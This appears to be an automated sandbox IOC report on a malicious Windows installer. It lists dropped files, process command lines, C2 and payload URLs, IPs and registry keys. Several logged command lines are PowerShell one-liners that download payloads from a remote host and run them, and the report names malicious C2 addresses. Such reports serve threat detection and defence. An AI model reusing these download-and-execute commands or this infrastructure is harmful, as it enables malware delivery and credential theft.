IOC Report
JlvRdFpwOD.exe

loading gif

Files

File Path
Type
Category
Malicious
JlvRdFpwOD.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
 malicious
C:\Users\user\AppData\Local\Temp\ejfydkiwv
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\i1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1926.tmp
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\ncgdcbnvvkpiwr
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\nsl17D4.tmp\INetC.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\nsl17D4.tmp\app.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.0.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.3.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\SecureClient\relay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\AEGIJKEHCAKFCAKFHDAAAAECFC
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\AFCBFIJE
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\AIXACVYBSB.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BKFBAECBAEGDGDHIEHIJ
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\CBAEHCAE
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\DTBZGIOOSO.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\DTBZGIOOSO.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EGIDAFBAEBKKEBFIJEBK
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\GIGIYTFFYT.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\HIEHDHCFIJDBFHJJDBFHJKJDHI
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\HQJBRDYKDE.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\IEHCBAFIDAECBGCBFHJEBGDHDB
SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
dropped
C:\ProgramData\KATAXZVCPS.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\KATAXZVCPS.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xd8d6edff, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_i1.exe_e5c0aeb6264ce24ecbda075532afc2d1a7c749d_e17d80e7_293502dd-527b-488a-bdca-7dc08537c16c\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5o8.0.exe_159cf91bdadc2a1c74c24bfeb554893126e946_f3a1083e_b283917a-912d-4d5e-8c3b-baefec863385\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER962B.tmp.dmp
Mini DuMP crash report, 15 streams, Thu May 2 08:42:23 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97C2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F2.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF523.tmp.dmp
Mini DuMP crash report, 14 streams, Thu May 2 08:42:47 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5F0.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF610.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\NHPKIZUUSG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NHPKIZUUSG.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ONBQCLYSPU.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\QCFWYSKMHA.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\SQRKHNBNYN.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\UMMBDNEQBN.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\XZXHAVGRAG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ZSSZYEFYMU.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\iolo technologies\logs\bootstrap.log
ASCII text, with CRLF line terminators
modified
C:\ProgramData\iolo\logs\WSComm.log
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\weio5oj4.d3n
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\load[1].bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\70ba1f3c
data
dropped
C:\Users\user\AppData\Local\Temp\879bd5de
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcjfx3jn.c1h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzjjhzrj.ewa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5c2vlmw.r2l.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0uskbkv.kq5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tha5eipm.vjf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwvvkhuz.cde.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\lfprexjoqqmf
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu May 2 07:42:18 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Local\Temp\tmpBC50.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
dropped
C:\Users\user\AppData\Local\Temp\u5o8.1.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\u5o8.2\bunch.dat
data
dropped
C:\Users\user\AppData\Local\Temp\u5o8.2\whale.dbf
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2AEA.tmp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu May 2 07:42:18 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk (copy)
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu May 2 07:42:18 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\bunch.dat
data
dropped
C:\Users\user\AppData\Roaming\SecureClient\whale.dbf
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
Chrome Cache Entry: 139
ASCII text, with very long lines (8534)
downloaded
There are 79 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\JlvRdFpwOD.exe
"C:\Users\user\Desktop\JlvRdFpwOD.exe"
 malicious
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\user\AppData\Local\Temp\nsl17D4.tmp\app.bat"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c={CHANNEL}','stat')"
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c={CHANNEL}','i1.exe')"
 malicious
C:\Users\user\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id={SPOLO_ID}', 'i2.bat')"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K i2.bat
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.0.exe
"C:\Users\user\AppData\Local\Temp\u5o8.0.exe"
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe
"C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.3.exe
"C:\Users\user\AppData\Local\Temp\u5o8.3.exe"
malicious
C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
 malicious
C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe
"C:\Users\user\AppData\Local\Temp\u5o8.2\run.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2312,i,1705992732450637003,3604299843699429544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2312,i,1705992732450637003,3604299843699429544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 2228
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 16 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
91.215.85.66
 malicious
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=
unknown
 malicious
http://185.172.128.150/c698e1bc8a2f5e6d.php
185.172.128.150
 malicious
http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
185.172.128.150
 malicious
http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
185.172.128.150
 malicious
https://d2iv78ooxaijb6.cloudfront.net
unknown
 malicious
http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
185.172.128.150
 malicious
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=
unknown
 malicious
http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
185.172.128.150
 malicious
https://monitor.azure.com//.default
unknown
http://www.vmware.com/0
unknown
https://snapshot.monitor.azure.com/&
unknown
http://185.172.128.150/c698e1bc8a2f5e6d.phpIDa
unknown
http://185.172.128.228/BroomSetup.exe
185.172.128.228
http://185.172.128.150/c698e1bc8a2f5e6d.phpaDI
unknown
http://crl.microsoft
unknown
http://185.172.128.59/ISetup1.exe
185.172.128.59
http://185.172.128.150/c698e1bc8a2f5e6d.php-fulluser-l1-1-0
unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
unknown
https://www.iolo.com/company/legal/sales-policy/
unknown
http://www.indyproject.org/
unknown
http://d2iv78ooxaijb6.cloudfront.net
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe6C:
unknown
http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dllAy
unknown
https://support.iolo.com/support/solutions/articles/44001781185?
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://www.iolo.com/company/legal/privacy/?
unknown
http://www.codeplex.com/CompositeWPF
unknown
https://support.iolo.com/support/solutions/articles/44001781185
unknown
https://scripts.sil.org/OFL
unknown
https://taskscheduler.codeplex.com/H
unknown
https://www.iolo.com/company/legal/sales-policy/?
unknown
https://nuget.org/nuget.exe
unknown
https://scripts.sil.org/OFLX8
unknown
https://westus2-2.in.applicationinsights.azure.com
unknown
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=%7BCHANNEL%7D
108.138.125.52
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
142.251.40.228
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://indiantypefoundry.com
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://download.avira.com/download/
unknown
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
unknown
http://dejavu.sourceforge.net
unknown
http://www.mozilla.com/en-US/blocklist/
unknown
https://www.iolo.com/company/legal/privacy/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://91.215.85.66:
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
unknown
http://crl.ver)
unknown
https://aka.ms/pscore6lBkq
unknown
https://rt.services.visualstudio.com/l
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://dc.services.visualstudio.com/
unknown
https://www.ecosia.org/newtab/
unknown
http://www.symauth.com/cps0(
unknown
https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000/silentget
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
unknown
https://github.com/Pester/Pester
unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
unknown
https://d295fdouc92v9n.cloudfront.net/
unknown
https://dc.services.visualstudio.com/f
unknown
https://profiler.monitor.azure.com/
unknown
http://185.172.128.59/syncUpd.exe
185.172.128.59
http://crl.micro
unknown
https://support.iolo.com/support/solutions/articles/44
unknown
http://www.symauth.com/rpa00
unknown
https://www.newtonsoft.com/jsonschema
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe
169.150.236.100
http://www.info-zip.org/
unknown
http://91.215.85.66:9000t-kq
unknown
http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dllH
unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
unknown
https://westus2-2.in.applicationinsights.azure.com/
unknown
https://www.iolo.com/company/legal/eula/?
unknown
http://dejavu.sourceforge.net/wiki/index.php/License
unknown
http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dllo
unknown
https://scripts.sil.org/OFLThis
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
unknown
https://github.com/itfoundry/Poppins)&&&&z
unknown
https://github.com/itfoundry/Poppins)
unknown
https://snapshot.monitor.azure.com/
unknown
https://github.com/itfoundry/Poppins)&&&&v
unknown
http://ocsp.sectigo.com0
unknown
https://contoso.com/License
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGOOjzbEGIjAjxm_uq7eJ4K6LnrN39eNjI0R2pOuq0UVNCdm4L6ull4GMPSjbz1Kky3lc4ucWFkgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.251.40.228
https://d295fdouc92v9n.cloudfront.net/load/load.php?c=1000=z)8
unknown
https://www.iolo.com/company/legal/eula/
unknown
http://185.172.128.228/ping.php?substr=one
185.172.128.228
https://www.newtonsoft.com/json
unknown
https://westus2-2.in.applicationinsights.azure.com/v2/track
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
download.iolo.net
unknown
 malicious
d295fdouc92v9n.cloudfront.net
108.138.113.167
d2iv78ooxaijb6.cloudfront.net
108.138.125.52
www.google.com
142.251.40.228
iolo0.b-cdn.net
169.150.236.100
note.padd.cn.com
176.97.76.106
svc.iolo.com
20.157.87.45
fp2e7a.wpc.phicdn.net
192.229.211.108
westus2-2.in.applicationinsights.azure.com
unknown

IPs

IP
Domain
Country
Malicious
185.172.128.90
unknown
Russian Federation
malicious
185.172.128.150
unknown
Russian Federation
malicious
192.168.2.4
unknown
unknown
malicious
91.215.85.66
unknown
Russian Federation
malicious
108.138.125.52
d2iv78ooxaijb6.cloudfront.net
United States
176.97.76.106
note.padd.cn.com
United Kingdom
142.251.40.228
www.google.com
United States
185.172.128.59
unknown
Russian Federation
169.150.236.100
iolo0.b-cdn.net
United States
142.251.32.100
unknown
United States
108.138.113.167
d295fdouc92v9n.cloudfront.net
United States
185.172.128.228
unknown
Russian Federation
20.157.87.45
svc.iolo.com
United States
239.255.255.250
unknown
Reserved
127.0.0.1
unknown
unknown
There are 5 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\BroomCleaner
Installed
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
MaxSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications
Retention
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Mechanic
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Mechanic
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Service Manager
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Service Manager
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\ActiveCare
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\ActiveCare
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Guard
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\System Guard
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Launch Manager
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Launch Manager
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Tune-Up Definitions
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Tune-Up Definitions
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Governor
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Governor
TypesSupported
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Memory Mechanic
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications\Memory Mechanic
TypesSupported
